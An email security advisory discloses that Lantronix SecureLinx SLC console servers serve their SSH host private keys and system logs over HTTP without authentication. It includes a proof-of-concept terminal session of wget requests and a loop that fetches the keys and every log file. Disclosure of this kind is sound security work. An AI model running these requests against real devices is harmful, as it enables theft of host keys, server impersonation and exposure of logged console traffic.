Hi,
I stumbled on another bug during my review for console servers:
Summary:
Lantronix SecureLinx console server: Retrieval of ssh-private keys and system logfiles
Confirmed on SLC32, Software version: 2.0, 3.0
very likely on all models of SLC series (SLC8, 16, 32, 48)
www.lantronix.com
Details:
Lantronix console servers come with a mini_httpd which doesn't care much
in its configuration in the subdirectories of DocRoot about Unix acls.
Lantronix SLC' have their /etc/ssh directory below DocumentRoot.
One can easily retrieve ssh private keys through the network without
providing credentials, thus rendering ssh-encryption close to useless.
Also one can read logfiles through the network. Though the directory
is named /cifsshare/logs/ it contains system logs, potentially also
snifferlogs from serial console sessions.
Note that console servers provide administrative console access to
devices hooked up on their serial lines (up to 48)
Vulnerable Versions:
Vendor Confirmation for SLC-Series, Firmware 2.0 (researched), 3.0 (current)
Patches/Workarounds:
Bugfix pending. Vendor is working on 3.1, to be released in August.
Supposedly fixed by then.
"Exploit":
%%%%%%%%%%%%%%%%
myprompt:~ # ssh slc
The authenticity of host 'slc (192.168.50.205)' can't be established.
RSA key fingerprint is d5:d8:93:33:db:b3:80:91:74:79:be:e7:ff:f6:c6:41.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'slc,192.168.50.205' (RSA) to the list of known hosts.
Welcome to the SLC
login: root
Password: Connection to slc closed.
myprompt:~ # tail -1 .ssh/known_hosts
slc,192.168.50.205 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA9FZwKSNlfAl72aWewoXE1e8g09
9yCSqVKGTRWSkOBKV8oqVgX8ryj/adwSLbwxSi8HyLd9AfiNmyyTJ4/ITX4JgpNCcw8k6SNK3HrletSs
7z4EGHiYcB25gIgX6fQrnjkm1AP3HXR0Wkeg7B5wFqwqKkNUd/aPhegLxjpufB0g0=
myprompt:~ # wget -q -O - https://slc/etc
Index of etc/
Index of etc/
-rw------- 1 root 672 Jan 1 1970 ssh_host_dsa_key
-rw-r--r-- 1 root 601 Jan 1 1970 ssh_host_dsa_key.pub
-rw------- 1 root 526 Jan 1 1970 ssh_host_key
-rw-r--r-- 1 root 330 Jan 1 1970 ssh_host_key.pub
-rw------- 1 root 883 Jan 1 1970 ssh_host_rsa_key
-rw-r--r-- 1 root 221 Jan 1 1970 ssh_host_rsa_key.pub
mini_httpd/1.15c 02m
ay2001
myprompt:~ # wget -q -O - https://slc/etc/ssh_host_rsa_key.pub
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA9FZwKSNlfAl72aWewoXE1e8g099yCSqVKGTRWSkOBKV8
oqVgX8ryj/adwSLbwxSi8HyLd9AfiNmyyTJ4/ITX4JgpNCcw8k6SNK3HrletSs7z4EGHiYcB25gIgX6f
Qrnjkm1AP3HXR0Wkeg7B5wFqwqKkNUd/aPhegLxjpufB0g0= root@(none)
myprompt:~ # wget -q -O - https://slc/etc/ssh_host_rsa_key | grep -w KEY
-----BEGIN RSA PRIVATE KEY-----
-----END RSA PRIVATE KEY-----
myprompt:~ # wget -q -O - https://slc/etc/ssh_host_dsa_key | grep -w KEY
-----BEGIN DSA PRIVATE KEY-----
-----END DSA PRIVATE KEY-----
myprompt:~ # wget -O - -q https://slc/cifsshare/logs/
Index of cifsshare/logs/
Index of cifsshare/logs/
lrwxrwxrwx Oct 21 2004 authentication -> ../../../var/log/secure
lrwxrwxrwx Oct 21 2004 devports -> ../../../var/log/devports
lrwxrwxrwx Oct 21 2004 diag -> ../../../var/log/diag
lrwxrwxrwx Oct 21 2004 general -> ../../../var/log/general
lrwxrwxrwx Oct 21 2004 network -> ../../../var/log/network
lrwxrwxrwx Oct 21 2004 services -> ../../../var/log/services
lrwxrwxrwx Oct 21 2004 sw -> ../../../var/log/sw
mini_httpd/1.15c 02may2001
myprompt:~ # for i in `lynx -dump -nolist https://slc/cifsshare/logs/ |awk '{ print $5 }'`; do echo ; echo ---$i---; wget -O - -q https://slc/cifsshare/logs/$i; done
[.. too long to list it here, but you have enough phantasy ..]
%%%%%%%%%%%%%%%%
more to come.
Cheers,
Dirk
--
Dr. Dirk Wetter http://drwetter.org
Consulting IT-Security + Open Source
Key fingerprint = 80A2 742B 8195 969C 5FA6 6584 8B6E 59C1 E41B 9153